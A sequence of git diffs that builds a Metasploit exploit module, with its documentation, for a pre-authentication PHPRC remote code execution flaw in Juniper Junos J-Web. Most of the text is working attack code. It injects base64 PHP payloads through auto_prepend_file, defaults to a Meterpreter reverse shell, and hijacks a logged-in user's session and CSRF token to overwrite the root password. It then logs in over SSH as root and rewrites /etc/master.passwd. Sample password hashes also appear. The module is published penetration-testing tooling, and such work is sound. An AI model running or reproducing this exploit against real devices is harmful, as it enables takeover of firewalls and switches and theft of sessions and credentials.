+bind:*:53:53::0:0:Bind Sandbox:/:/sbin/nologin
+uucp:*:66:66::0:0:UUCP pseudo-user:/var/spool/uucppublic:/sbin/nologin
+nobody:*:65534:65534::0:0:Unprivileged user:/nonexistent:/sbin/nologin
+admin:$6$Dj.crXwf$EyAmqaJz7f3.JldkbZk7eZuApofQ7zK/z/7Q5ntrD3cebxYc9/Y2FSoJcUIZSgYwKGGyd0nnfNSvaHzkz6BLL1:2000:20:j-super-user:0:0:Administrator:/var/home/admin:/usr/sbin/cli
 ```

--- a/documentation/modules/exploit/freebsd/http/junos_phprc_auto_prepend_file.md
+++ b/documentation/modules/exploit/freebsd/http/junos_phprc_auto_prepend_file.md
@@ -96,7 +96,7 @@ Module options (exploit/freebsd/http/junos_phprc_auto_prepend_file):
    SSH_TIMEOUT        30                        yes       The maximum acceptable amount of time to negotiate a SSH session
    SSL                false                     no        Negotiate SSL/TLS for outgoing connections
    SSLCert                                      no        Path to a custom SSL certificate (default is randomly generated)
-   TMP_ROOT_PASSWORD  gCg6b3NTs10qWjiRVSsjAv7n  yes       If target is set to "Interactive WebSocket with jail break", the root user's password will be temporarily changed to this password
+   TMP_ROOT_PASSWORD  gCg6b3NTs10qWjiRVSsjAv7n  yes       If target is set to "Interactive SSH with jail break", the root user's password will be temporarily changed to this password
    URIPATH                                      no        The URI to use for this exploit (default is random)
    VHOST                                        no        HTTP server virtual host
 
@@ -144,7 +144,7 @@ Meterpreter : php/freebsd
 meterpreter > exit
 ```
 
-### Interactive WebSocket with jail break junos-vsrx3-x86-64-20.2R1.10.scsi.ova 
+### Interactive SSH with jail break junos-vsrx3-x86-64-20.2R1.10.scsi.ova 
 ```
 msf6 exploit(freebsd/http/junos_phprc_auto_prepend_file) > show targets
 
@@ -154,7 +154,7 @@ Exploit targets:
     Id  Name
     --  ----
 =>  0   PHP In-Memory
-    1   Interactive WebSocket with jail break
+    1   Interactive SSH with jail break
 
 
 msf6 exploit(freebsd/http/junos_phprc_auto_prepend_file) > set target 1
@@ -172,7 +172,7 @@ Module options (exploit/freebsd/http/junos_phprc_auto_prepend_file):
    SSH_TIMEOUT        30                        yes       The maximum acceptable amount of time to negotiate a SSH session
    SSL                false                     no        Negotiate SSL/TLS for outgoing connections
    SSLCert                                      no        Path to a custom SSL certificate (default is randomly generated)
-   TMP_ROOT_PASSWORD  gCg6b3NTs10qWjiRVSsjAv7n  yes       If target is set to "Interactive WebSocket with jail break", the root user's password will be temporarily changed to this password
+   TMP_ROOT_PASSWORD  gCg6b3NTs10qWjiRVSsjAv7n  yes       If target is set to "Interactive SSH with jail break", the root user's password will be temporarily changed to this password
    URIPATH                                      no        The URI to use for this exploit (default is random)
    VHOST                                        no        HTTP server virtual host
 
@@ -195,7 +195,7 @@ Exploit target:
 
    Id  Name
    --  ----
-   1   Interactive WebSocket with jail break
+   1   Interactive SSH with jail break
 
 
 

--- a/modules/exploits/freebsd/http/junos_phprc_auto_prepend_file.rb
+++ b/modules/exploits/freebsd/http/junos_phprc_auto_prepend_file.rb
@@ -31,6 +31,7 @@ class MetasploitModule < Msf::Exploit::Remote
           'Ron Bowes'     # Target setup instructions
         ],
         'References' => [
+          [ 'URL', 'https://labs.watchtowr.com/cve-2023-36844-and-friends-rce-in-juniper-firewalls/'],
           [ 'URL', 'https://vulncheck.com/blog/juniper-cve-2023-36845'],
           [ 'URL', 'https://supportportal.juniper.net/s/article/2023-08-Out-of-Cycle-Security-Bulletin-Junos-OS-SRX-Series-and-EX-Series-Multiple-vulnerabilities-in-J-Web-can-be-combined-to-allow-a-preAuth-Remote-Code-Execution?language=en_US'],
           [ 'CVE', '2023-36845']
@@ -55,9 +56,10 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def check
     res = send_request_cgi(
-      'uri' => normalize_uri(target_uri.path, '?LD_PRELOAD=/tmp/ld'),
+      'uri' => normalize_uri(target_uri.path),
       'method' => 'POST',
-      'ctype' => 'application/x-www-form-urlencoded'
+      'ctype' => 'application/x-www-form-urlencoded',
+      'data' => 'LD_PRELOAD=/tmp/ld'
     )
 
     return CheckCode::Appears('Environment variable manipulation succeeded indicating this target is vulnerable.') if res && res.body.include?('Cannot open "/tmp/ld"')
@@ -70,10 +72,13 @@ class MetasploitModule < Msf::Exploit::Remote
     post_data << "auto_prepend_file=\"data://text/plain;base64,#{Rex::Text.encode_base64(cmd)}\""
 
     res = send_request_cgi(
-      'uri' => normalize_uri(target_uri.path, '?PHPRC=/dev/fd/0'),
+      'uri' => normalize_uri(target_uri.path),
       'method' => 'POST',
       'data' => post_data.to_s,
-      'ctype' => 'application/x-www-form-urlencoded'
+      'ctype' => 'application/x-www-form-urlencoded',
+      'vars_get' => {
+        'PHPRC' => '/dev/fd/0'
+      }
     )
 
     print_error('The exploitation attempt returned a response which indicates exploitation was unsuccessful.') if res

--- a/modules/exploits/freebsd/http/junos_phprc_auto_prepend_file.rb
+++ b/modules/exploits/freebsd/http/junos_phprc_auto_prepend_file.rb
@@ -47,7 +47,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'DisclosureDate' => '2023-08-17',
         'Notes' => {
           'Stability' => [ CRASH_SAFE, ],
-          'SideEffects' => [ ],
+          'SideEffects' => [ CONFIG_CHANGES ],
           'Reliability' => [ REPEATABLE_SESSION, ]
         }
       )
@@ -67,14 +67,14 @@ class MetasploitModule < Msf::Exploit::Remote
     CheckCode::Safe('Environment variable manipulation failed indicating this target is not vulnerable.')
   end
 
-  def execute_command(cmd, _opts = {})
+  def exploit
     post_data = "allow_url_include=1\n"
-    post_data << "auto_prepend_file=\"data://text/plain;base64,#{Rex::Text.encode_base64(cmd)}\""
+    post_data << "auto_prepend_file=\"data://text/plain;base64,#{Rex::Text.encode_base64(payload.encoded)}\""
 
     res = send_request_cgi(
       'uri' => normalize_uri(target_uri.path),
       'method' => 'POST',
-      'data' => post_data.to_s,
+      'data' => post_data,
       'ctype' => 'application/x-www-form-urlencoded',
       'vars_get' => {
         'PHPRC' => '/dev/fd/0'
@@ -82,9 +82,5 @@ class MetasploitModule < Msf::Exploit::Remote
     )
 
     print_error('The exploitation attempt returned a response which indicates exploitation was unsuccessful.') if res
-  end
-
-  def exploit
-    execute_command(payload.encoded)
   end
 end

--- a/modules/exploits/freebsd/http/junos_phprc_auto_prepend_file.rb
+++ b/modules/exploits/freebsd/http/junos_phprc_auto_prepend_file.rb
@@ -1,0 +1,85 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Junos OS PHPRC Environment Variable Manipulation RCE',
+        'Description' => %q{
+          This module exploits a PHP environment variable manipulation vulnerability affecting Juniper SRX firewalls
+          and EX switches. The affected Juniper devices run FreeBSD and every FreeBSD process can access their stdin
+          by opening /dev/fd/0. The exploit also makes use of two useful PHP features. The first being
+          'auto_prepend_file' which causes the provided file to be added using the 'require' function. The second PHP
+          function is 'allow_url_include' which allows the use of URL-aware fopen wrappers. By enabling
+          allow_url_include, the exploit can use any protocol wrapper with auto_prepend_file. The module then uses
+          data:// to provide a file inline which includes the base64 encoded PHP payload.
+        },
+        'Author' => [
+          'Jacob Baines', # Analysis
+          'jheysel-r7',   # Msf module
+          'Ron Bowes'     # Target setup instructions
+        ],
+        'References' => [
+          [ 'URL', 'https://vulncheck.com/blog/juniper-cve-2023-36845'],
+          [ 'URL', 'https://supportportal.juniper.net/s/article/2023-08-Out-of-Cycle-Security-Bulletin-Junos-OS-SRX-Series-and-EX-Series-Multiple-vulnerabilities-in-J-Web-can-be-combined-to-allow-a-preAuth-Remote-Code-Execution?language=en_US'],
+          [ 'CVE', '2023-36845']
+        ],
+        'License' => MSF_LICENSE,
+        'Platform' => 'php',
+        'Privileged' => false,
+        'Arch' => ARCH_PHP,
+        'Targets' => [
+          ['Junos OS SRX Firewall / EX Switch', {}]
+        ],
+        'DefaultTarget' => 0,
+        'DisclosureDate' => '2023-08-17',
+        'Notes' => {
+          'Stability' => [ CRASH_SAFE, ],
+          'SideEffects' => [ ],
+          'Reliability' => [ REPEATABLE_SESSION, ]
+        }
+      )
+    )
+  end
+
+  def check
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, '?LD_PRELOAD=/tmp/ld'),
+      'method' => 'POST',
+      'ctype' => 'application/x-www-form-urlencoded'
+    )
+
+    return CheckCode::Appears('Environment variable manipulation succeeded indicating this target is vulnerable.') if res && res.body.include?('Cannot open "/tmp/ld"')
+
+    CheckCode::Safe('Environment variable manipulation failed indicating this target is not vulnerable.')
+  end
+
+  def execute_command(cmd, _opts = {})
+    post_data = "allow_url_include=1\n"
+    post_data << "auto_prepend_file=\"data://text/plain;base64,#{Rex::Text.encode_base64(cmd)}\""
+
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, '?PHPRC=/dev/fd/0'),
+      'method' => 'POST',
+      'data' => post_data.to_s,
+      'ctype' => 'application/x-www-form-urlencoded'
+    )
+
+    print_error('The exploitation attempt returned a response which indicates exploitation was unsuccessful.') if res
+  end
+
+  def exploit
+    execute_command(payload.encoded)
+  end
+end

--- a/modules/exploits/freebsd/http/junos_phprc_auto_prepend_file.rb
+++ b/modules/exploits/freebsd/http/junos_phprc_auto_prepend_file.rb
@@ -29,11 +29,17 @@ class MetasploitModule < Msf::Exploit::Remote
           function is 'allow_url_include' which allows the use of URL-aware fopen wrappers. By enabling
           allow_url_include, the exploit can use any protocol wrapper with auto_prepend_file. The module then uses
           data:// to provide a file inline which includes the base64 encoded PHP payload.
+
+          By default this exploit returns a session confined to a FreeBSD jail with limited functionality. There is a
+          datastore option 'JAIL_BREAK', that when set to true, will steal the necessary tokens from a user authenticated
+          to the J-Web application, in order to over write the the root password hash. If there is no user
+          authenticated to the J-Web application this method will not work. The module then authenticates
+          with the new root password over SSH and then rewrites the original root password hash to /etc/master.passwd.
         },
         'Author' => [
-          'Jacob Baines', # Analysis
-          'jheysel-r7',   # Msf module
-          'Ron Bowes'     # Target setup instructions
+          'Jacob Baines',  # Analysis
+          'Ron Bowes',     # Jail break technique + Target setup instructions
+          'jheysel-r7'     # Msf module
         ],
         'References' => [
           [ 'URL', 'https://labs.watchtowr.com/cve-2023-36844-and-friends-rce-in-juniper-firewalls/'],
@@ -44,9 +50,38 @@ class MetasploitModule < Msf::Exploit::Remote
         'License' => MSF_LICENSE,
         'Platform' => %w[php unix],
         'Privileged' => false,
-        'Arch' => [ARCH_PHP, ARCH_CMD] ,
+        'Arch' => [ARCH_PHP, ARCH_CMD],
         'Targets' => [
-          ['Junos OS SRX Firewall / EX Switch', {}]
+          [
+            'PHP In-Memory',
+            {
+              'Platform' => 'php',
+              'Arch' => ARCH_PHP,
+              'Type' => :php_memory,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'php/meterpreter/reverse_tcp',
+                'RPORT' => 80
+              }
+            },
+          ],
+          [
+            'Interactive WebSocket',
+            {
+              'Arch' => ARCH_CMD,
+              'Platform' => 'unix',
+              'Type' => :nix_stream,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/unix/interact'
+              },
+              'Payload' => {
+                'Compat' => {
+                  'PayloadType' => 'cmd_interact',
+                  'ConnectionType' => 'find'
+                }
+              }
+            }
+          ]
+
         ],
         'DefaultTarget' => 0,
         'DisclosureDate' => '2023-08-17',
@@ -59,12 +94,20 @@ class MetasploitModule < Msf::Exploit::Remote
     )
 
     register_options([
-                       OptBool.new('JAIL_BREAK', [false, 'Break out of FreeBSD jail by changing the root users password. This requires that a user is authenticated to the J-Web application in order to steal a session token, also that root logon is enabled on the device', false]),
-                       OptString.new('PASSWORD', [ false, 'If JAIL_BREAK is set to true, the root users password will be temporarily changed to this password', rand_text_alphanumeric(8)]),
-                       OptPort.new('SSH_PORT', [true, 'SSH port of Junos Target', 22]),
-                       OptInt.new('SSH_TIMEOUT', [ false, 'Specify the maximum time to negotiate a SSH session', 30])
-                     ])
+      OptBool.new('JAIL_BREAK', [false, 'Break out of FreeBSD jail by changing the root user\'s password, establishing an SSH session and then rewriting the original root user\'s password hash to /etc/master.passwd. This requires that a user is authenticated to the J-Web application in order to steal a session token, also that ssh root logon is enabled on the device', false]),
+      OptString.new('PASSWORD', [ false, 'If JAIL_BREAK is set to true, the root users password will be temporarily changed to this password', rand_text_alphanumeric(8)]),
+      OptPort.new('SSH_PORT', [true, 'SSH port of Junos Target', 22]),
+      OptInt.new('SSH_TIMEOUT', [ false, 'Specify the maximum time to negotiate a SSH session', 30])
+    ])
+  end
 
+  def on_new_session(session)
+    super
+    if datastore['JAIL_BREAK']
+      print_status('Rewriting the original root password hash to /etc/master.passwd')
+      command = "awk -F: -v originalpass='#{@og_encrypted_root_pass}' 'BEGIN {OFS=FS} $1==\"root\" {$2=originalpass} {print}' /etc/master.passwd > /etc/master.passwd"
+      session.shell_command_token(command)
+    end
   end
 
   def check
@@ -84,7 +127,7 @@ class MetasploitModule < Msf::Exploit::Remote
   def send_php_exploit(phprc, file_contents)
     post_data = "allow_url_include=1\n"
     post_data << "auto_prepend_file=\"data://text/plain;base64,#{Rex::Text.encode_base64(file_contents)}\""
-    res = send_request_cgi(
+    send_request_cgi(
       'uri' => normalize_uri(target_uri.path),
       'method' => 'POST',
       'data' => post_data,
@@ -95,33 +138,27 @@ class MetasploitModule < Msf::Exploit::Remote
     )
   end
 
-  # def on_new_session(client)
-  #   super
-  #
-  #
-  # end
-
   def get_php_session_id
-    get_var_sess  = "<?php print_r(scandir('/var/sess'));?>"
+    get_var_sess = "<?php print_r(scandir('/var/sess'));?>"
     res = send_php_exploit('/dev/fd/0', get_var_sess)
 
     fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service") if res.nil?
     fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected response (response code: #{res.code})") unless res.code == 200
 
-    php_session_id = res.body.scan(%r{\[\d+\] => sess_(.*)}).flatten[0]
+    php_session_id = res.body.scan(/\[\d+\] => sess_(.*)/).flatten[0]
 
-    fail_with(Failure:: UnexpectedReply, "Failed to retrieve PHP Session ID. There might not be a user logged in at the moment which would cause this to fail.\n Try setting JAIL_BREAK to false to in order to get a session as the 'nobody' user. Or try again when a there is a user authenticated to the J-Web application.") unless php_session_id
+    fail_with(Failure::UnexpectedReply, "Failed to retrieve PHP Session ID. There might not be a user logged in at the moment which would cause this to fail.\n Try setting JAIL_BREAK to false to in order to get a session as the 'nobody' user. Or try again when a there is a user authenticated to the J-Web application.") unless php_session_id
     print_status("Found PHPSESSID: #{php_session_id}.")
     php_session_id
   end
 
   def get_csrf_token(php_session_id)
     res = send_request_cgi(
-      'uri' => normalize_uri(target_uri.path, '/diagnose'),
+      'uri' => normalize_uri(target_uri.path, 'diagnose'),
       'method' => 'GET',
       'headers' =>
         {
-          'Cookie' => "PHPSESSID=#{php_session_id}",
+          'Cookie' => "PHPSESSID=#{php_session_id}"
         },
       'vars_get' => {
         'm[]' => 'pinghost'
@@ -132,51 +169,52 @@ class MetasploitModule < Msf::Exploit::Remote
     fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected response (response code: #{res.code})") unless res.code == 200
 
     csrf_token = res.get_html_document.xpath("//input[@type='hidden' and @name='csrf_token']/@value").text
-    fail_with(Failure:: UnexpectedReply, "Unable to retrieve a csrf token") unless csrf_token
+    fail_with(Failure::UnexpectedReply, 'Unable to retrieve a csrf token') unless csrf_token
     print_status("Found csrf token: #{csrf_token}.")
     csrf_token
   end
 
   def get_encrypted_root_password(php_session_id, csrf_token)
-
     post_data = "rs=get_cli_data&rsargs[]=getQuery&csrf_token=#{csrf_token}&key=1"
 
     res = send_request_cgi(
-      'uri' => normalize_uri(target_uri.path, '/jsdm/ajax/cli-editor.php'),
+      'uri' => normalize_uri(target_uri.path, 'jsdm', 'ajax', 'cli-editor.php'),
       'method' => 'POST',
       'data' => post_data,
       'ctype' => 'application/x-www-form-urlencoded',
       'headers' =>
         {
-          'Cookie' => "PHPSESSID=#{php_session_id}",
+          'Cookie' => "PHPSESSID=#{php_session_id}"
         }
     )
 
     fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service") if res.nil?
     fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected response (response code: #{res.code})") unless res.code == 200
 
-    #Multple passwords are displayed in the output, we want to grab the system section first before attempting to located a password
+    # Multiple passwords are displayed in the output, we want to grab the system section first before attempting to located a password
     system_section = res.body.scan(/system \{([^}]+)\}/m).flatten[0]
     fail_with(Failure::UnexpectedReply, 'Unable to retrieve the system configuration section and thus the root password from the response') unless system_section
 
-    encrypted_root_password = system_section.scan(/\".*\";/)
-    print_status("Encrypted root password: #{encrypted_root_password}")
+    og_encrypted_root_pass = system_section.scan(/encrypted-password "(.*)";/).flatten[0]
+    fail_with(Failure::UnexpectedReply, 'Unable to retrieve the encrypted root password from the response') unless og_encrypted_root_pass
+
+    print_status("Original encrypted root password: #{og_encrypted_root_pass}")
+    og_encrypted_root_pass
   end
 
   def set_new_root_password(php_session_id, csrf_token)
-
     password_hash = UnixCrypt::SHA512.build(datastore['PASSWORD'])
-    puts "Password Hash: #{password_hash}"
+    print_status "Temporary root password Hash: #{password_hash}"
 
     post_data = "&current-path=/system/root-authentication/&csrf_token=#{csrf_token}&key=1&JTK-FIELD-encrypted-password=#{password_hash}"
     res = send_request_cgi(
-      'uri' => normalize_uri(target_uri.path, '/editor/edit/configuration/system/root-authentication'),
+      'uri' => normalize_uri(target_uri.path, 'editor', 'edit', 'configuration', 'system', 'root-authentication'),
       'method' => 'POST',
       'data' => post_data,
       'ctype' => 'application/x-www-form-urlencoded',
       'headers' =>
         {
-          'Cookie' => "PHPSESSID=#{php_session_id}",
+          'Cookie' => "PHPSESSID=#{php_session_id}"
         },
       'vars_get' => {
         'action' => 'commit'
@@ -186,28 +224,22 @@ class MetasploitModule < Msf::Exploit::Remote
     fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service") if res.nil?
     fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected response (response code: #{res.code})") unless res.code == 200
 
-     unless res.get_html_document.xpath("//body/div[@class='commit-status' and @id='systest-commit-status-div']").text == 'Success'
-       fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected response (response code: #{res.code})")
-     end
-    print_status("Successfully changed the root user's password to #{datastore['PASSWORD']}" )
+    unless res.get_html_document.xpath("//body/div[@class='commit-status' and @id='systest-commit-status-div']").text == 'Success'
+      fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected response (response code: #{res.code})")
+    end
+    print_status("Successfully changed the root user's password to #{datastore['PASSWORD']}")
   end
 
-
   def ssh_login
-
-    require 'pry-byebug'
-    binding.pry
-
     ssh_opts = ssh_client_defaults.merge({
-                                           port: datastore['SSH_PORT'],
-                                           auth_methods: ['password'],
-                                           password: datastore['PASSWORD']
-                                         })
+      port: datastore['SSH_PORT'],
+      auth_methods: ['password'],
+      password: datastore['PASSWORD']
+    })
 
     begin
-      ssh = nil
-      ::Timeout.timeout(datastore['SSH_TIMEOUT']) do
-        ssh = Net::SSH.start(datastore['RHOSTS'], 'root', ssh_opts)
+      ssh = Timeout.timeout(datastore['SSH_TIMEOUT']) do
+        Net::SSH.start(rhost, 'root', ssh_opts)
       end
     rescue Net::SSH::Exception => e
       vprint_error("#{e.class}: #{e.message}")
@@ -215,39 +247,26 @@ class MetasploitModule < Msf::Exploit::Remote
     end
 
     if ssh
-      print_status('Creating SSH::CommandStream')
-      conn = Net::SSH::CommandStream.new(ssh)
-      ssh = nil
-      return conn
+      Net::SSH::CommandStream.new(ssh)
     end
-
-  end
-
-
-
-  def ssh_stuff
-
-
-    Net::SSH::CommandStream.new(ssh_connection)
-
   end
 
   def exploit
-
     if datastore['JAIL_BREAK']
+      fail_with(Failure::BadConfig, 'If JAIL_BREAK is enabled the target type must be set to Interactive WebSocket') unless target['Type'] == :nix_stream
       php_session_id = get_php_session_id
       csrf_token = get_csrf_token(php_session_id)
-      @encrypted_root_password = get_encrypted_root_password(php_session_id, csrf_token)
+      @og_encrypted_root_pass = get_encrypted_root_password(php_session_id, csrf_token)
       set_new_root_password(php_session_id, csrf_token)
 
       if (ssh = ssh_login)
-        print_good("Logged in as root")
+        print_good('Logged in as root')
         handler(ssh.lsock)
       end
 
     else
+      fail_with(Failure::BadConfig, 'If JAIL_BREAK is set to false the target type must be set to PHP In-Memory') unless target['Type'] == :php_memory
       send_php_exploit('/dev/fd/0', payload.encoded)
     end
-
   end
 end

--- a/modules/exploits/freebsd/http/junos_phprc_auto_prepend_file.rb
+++ b/modules/exploits/freebsd/http/junos_phprc_auto_prepend_file.rb
@@ -211,7 +211,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     # Multiple passwords are displayed in the output, ensure we grab the encrypted-password that belongs to the
     # root-authentication configuration with the following regex:
-    og_encrypted_root_pass = res.body.scan(/root-authentication\s+\{\n\s+encrypted-password\s+\"(.+)\"/).flatten[0]
+    og_encrypted_root_pass = res.body.scan(/root-authentication\s+\{\n\s+encrypted-password\s+"(.+)"/).flatten[0]
     fail_with(Failure::UnexpectedReply, 'Unable to retrieve the encrypted root password from the response') unless og_encrypted_root_pass
 
     print_status("Original encrypted root password: #{og_encrypted_root_pass}")

--- a/modules/exploits/freebsd/http/junos_phprc_auto_prepend_file.rb
+++ b/modules/exploits/freebsd/http/junos_phprc_auto_prepend_file.rb
@@ -32,7 +32,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
           By default this exploit returns a session confined to a FreeBSD jail with limited functionality. There is a
           datastore option 'JAIL_BREAK', that when set to true, will steal the necessary tokens from a user authenticated
-          to the J-Web application, in order to over write the the root password hash. If there is no user
+          to the J-Web application, in order to overwrite the the root password hash. If there is no user
           authenticated to the J-Web application this method will not work. The module then authenticates
           with the new root password over SSH and then rewrites the original root password hash to /etc/master.passwd.
         },
@@ -65,13 +65,14 @@ class MetasploitModule < Msf::Exploit::Remote
             },
           ],
           [
-            'Interactive WebSocket',
+            'Interactive WebSocket with jail break',
             {
               'Arch' => ARCH_CMD,
               'Platform' => 'unix',
               'Type' => :nix_stream,
               'DefaultOptions' => {
-                'PAYLOAD' => 'cmd/unix/interact'
+                'PAYLOAD' => 'cmd/unix/interact',
+                'WfsDelay' => 30
               },
               'Payload' => {
                 'Compat' => {
@@ -94,19 +95,28 @@ class MetasploitModule < Msf::Exploit::Remote
     )
 
     register_options([
-      OptBool.new('JAIL_BREAK', [false, 'Break out of FreeBSD jail by changing the root user\'s password, establishing an SSH session and then rewriting the original root user\'s password hash to /etc/master.passwd. This requires that a user is authenticated to the J-Web application in order to steal a session token, also that \'ssh root-login\' is set to \'allow\' on the device', false]),
-      OptString.new('TMP_ROOT_PASSWORD', [ false, 'If JAIL_BREAK is set to true, the root users password will be temporarily changed to this password', rand_text_alphanumeric(24)]),
+      OptString.new('TMP_ROOT_PASSWORD', [ true, 'If target is set to "Interactive WebSocket with jail break", the root user\'s password will be temporarily changed to this password', rand_text_alphanumeric(24)]),
       OptPort.new('SSH_PORT', [true, 'SSH port of Junos Target', 22]),
-      OptInt.new('SSH_TIMEOUT', [ false, 'The maximum acceptable amount of time to negotiate a SSH session', 30])
+      OptInt.new('SSH_TIMEOUT', [ true, 'The maximum acceptable amount of time to negotiate a SSH session', 30])
     ])
   end
 
   def on_new_session(session)
     super
-    if datastore['JAIL_BREAK']
+    if target['Type'] == :nix_stream
       print_status('Rewriting the original root password hash to /etc/master.passwd')
-      command = "awk -F: -v originalpass='#{@og_encrypted_root_pass}' 'BEGIN {OFS=FS} $1==\"root\" {$2=originalpass} {print}' /etc/master.passwd > /etc/master.passwd"
-      session.shell_command_token(command)
+
+      tmp_file_name = rand_text_alphanumeric(8..16)
+
+      commands = [
+        "awk -F: -v originalpass='#{@og_encrypted_root_pass}' 'BEGIN {OFS=FS} $1==\"root\" {$2=originalpass} {print}' /etc/master.passwd > /tmp/#{tmp_file_name}",
+        "cp /tmp/#{tmp_file_name} /etc/master.passwd",
+        "rm /tmp/#{tmp_file_name}"
+      ]
+
+      commands.each do |command|
+        session.shell_command_token(command)
+      end
     end
   end
 
@@ -209,6 +219,7 @@ class MetasploitModule < Msf::Exploit::Remote
     #       }
     #     }
 
+    fail_with(Failure::UnexpectedReply, 'ssh root-login is not permitted on the device thus the module will not be able to establish a session or restore the original root password.') unless res.body.scan(/"ssh\s+\{\n\s+root-login\s+allow;"/)
     # Multiple passwords are displayed in the output, ensure we grab the encrypted-password that belongs to the
     # root-authentication configuration with the following regex:
     og_encrypted_root_pass = res.body.scan(/root-authentication\s+\{\n\s+encrypted-password\s+"(.+)"/).flatten[0]
@@ -268,8 +279,10 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
-    if datastore['JAIL_BREAK']
-      fail_with(Failure::BadConfig, 'If JAIL_BREAK is enabled the target type must be set to Interactive WebSocket') unless target['Type'] == :nix_stream
+    case target['Type']
+    when :nix_stream
+      print_status("Attempting to break out of FreeBSD jail by changing the root user's password, establishing an SSH session and then rewriting the original root user's password hash to /etc/master.passwd.")
+      print_warning("This requires a user is authenticated to the J-Web application in order to steal a session token, also 'ssh root-login' is set to 'allow' on the device")
       php_session_id = get_php_session_id
       csrf_token = get_csrf_token(php_session_id)
       @og_encrypted_root_pass = get_encrypted_root_password(php_session_id, csrf_token)
@@ -280,9 +293,10 @@ class MetasploitModule < Msf::Exploit::Remote
         handler(ssh.lsock)
       end
 
-    else
-      fail_with(Failure::BadConfig, 'If JAIL_BREAK is set to false the target type must be set to PHP In-Memory') unless target['Type'] == :php_memory
+    when :php_memory
       send_php_exploit('/dev/fd/0', payload.encoded)
+    else
+      fail_with(Failure::BadConfig, 'Please select a valid target.')
     end
   end
 end

--- a/modules/exploits/freebsd/http/junos_phprc_auto_prepend_file.rb
+++ b/modules/exploits/freebsd/http/junos_phprc_auto_prepend_file.rb
@@ -94,10 +94,10 @@ class MetasploitModule < Msf::Exploit::Remote
     )
 
     register_options([
-      OptBool.new('JAIL_BREAK', [false, 'Break out of FreeBSD jail by changing the root user\'s password, establishing an SSH session and then rewriting the original root user\'s password hash to /etc/master.passwd. This requires that a user is authenticated to the J-Web application in order to steal a session token, also that ssh root logon is enabled on the device', false]),
-      OptString.new('PASSWORD', [ false, 'If JAIL_BREAK is set to true, the root users password will be temporarily changed to this password', rand_text_alphanumeric(8)]),
+      OptBool.new('JAIL_BREAK', [false, 'Break out of FreeBSD jail by changing the root user\'s password, establishing an SSH session and then rewriting the original root user\'s password hash to /etc/master.passwd. This requires that a user is authenticated to the J-Web application in order to steal a session token, also that \'ssh root-login\' is set to \'allow\' on the device', false]),
+      OptString.new('TMP_ROOT_PASSWORD', [ false, 'If JAIL_BREAK is set to true, the root users password will be temporarily changed to this password', rand_text_alphanumeric(24)]),
       OptPort.new('SSH_PORT', [true, 'SSH port of Junos Target', 22]),
-      OptInt.new('SSH_TIMEOUT', [ false, 'Specify the maximum time to negotiate a SSH session', 30])
+      OptInt.new('SSH_TIMEOUT', [ false, 'The maximum acceptable amount of time to negotiate a SSH session', 30])
     ])
   end
 
@@ -147,7 +147,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     php_session_id = res.body.scan(/\[\d+\] => sess_(.*)/).flatten[0]
 
-    fail_with(Failure::UnexpectedReply, "Failed to retrieve PHP Session ID. There might not be a user logged in at the moment which would cause this to fail.\n Try setting JAIL_BREAK to false to in order to get a session as the 'nobody' user. Or try again when a there is a user authenticated to the J-Web application.") unless php_session_id
+    fail_with(Failure::UnexpectedReply, "Failed to retrieve a PHP Session ID. There might not be a user logged in at the moment which would cause this to fail.\n Try setting JAIL_BREAK to false to in order to get a session as the 'nobody' user. Or try again when a there is a user authenticated to the J-Web application.") unless php_session_id
     print_status("Found PHPSESSID: #{php_session_id}.")
     php_session_id
   end
@@ -191,11 +191,27 @@ class MetasploitModule < Msf::Exploit::Remote
     fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service") if res.nil?
     fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected response (response code: #{res.code})") unless res.code == 200
 
-    # Multiple passwords are displayed in the output, we want to grab the system section first before attempting to located a password
-    system_section = res.body.scan(/system \{([^}]+)\}/m).flatten[0]
-    fail_with(Failure::UnexpectedReply, 'Unable to retrieve the system configuration section and thus the root password from the response') unless system_section
+    # The body of the above request is formatted like so:
 
-    og_encrypted_root_pass = system_section.scan(/encrypted-password "(.*)";/).flatten[0]
+    ## Last changed: 2023-09-25 13:00:49 UTC
+    # version 20200609.165031.6_builder.r1115480;
+    # system {
+    #   host-name JUNOS;
+    #   root-authentication {
+    #     encrypted-password "$6$yMwZY.o0$WwCZgzN7FTDfhSvkum0y9ry/nu4yWOQcgW.JJz0vJapf5P6XHoCsigsz94oEKSPO5efKFP/JhhN3/FCKvB0Hp.";
+    #   }
+    #   login {
+    #     user admin {
+    #       uid 2000;
+    #       class super-user;
+    #       authentication {
+    #         encrypted-password "$6$65gs/MrK$DNpVWfIocQ.rG/ThjZXjRI/yha/lf1UImNKivq.T1K4yLW60PWFrcQakoP6mwHT9Cr3xQZZfomKSTRXWl2aWj1";
+    #       }
+    #     }
+
+    # Multiple passwords are displayed in the output, ensure we grab the encrypted-password that belongs to the
+    # root-authentication configuration with the following regex:
+    og_encrypted_root_pass = res.body.scan(/root-authentication\s+\{\n\s+encrypted-password\s+\"(.+)\"/).flatten[0]
     fail_with(Failure::UnexpectedReply, 'Unable to retrieve the encrypted root password from the response') unless og_encrypted_root_pass
 
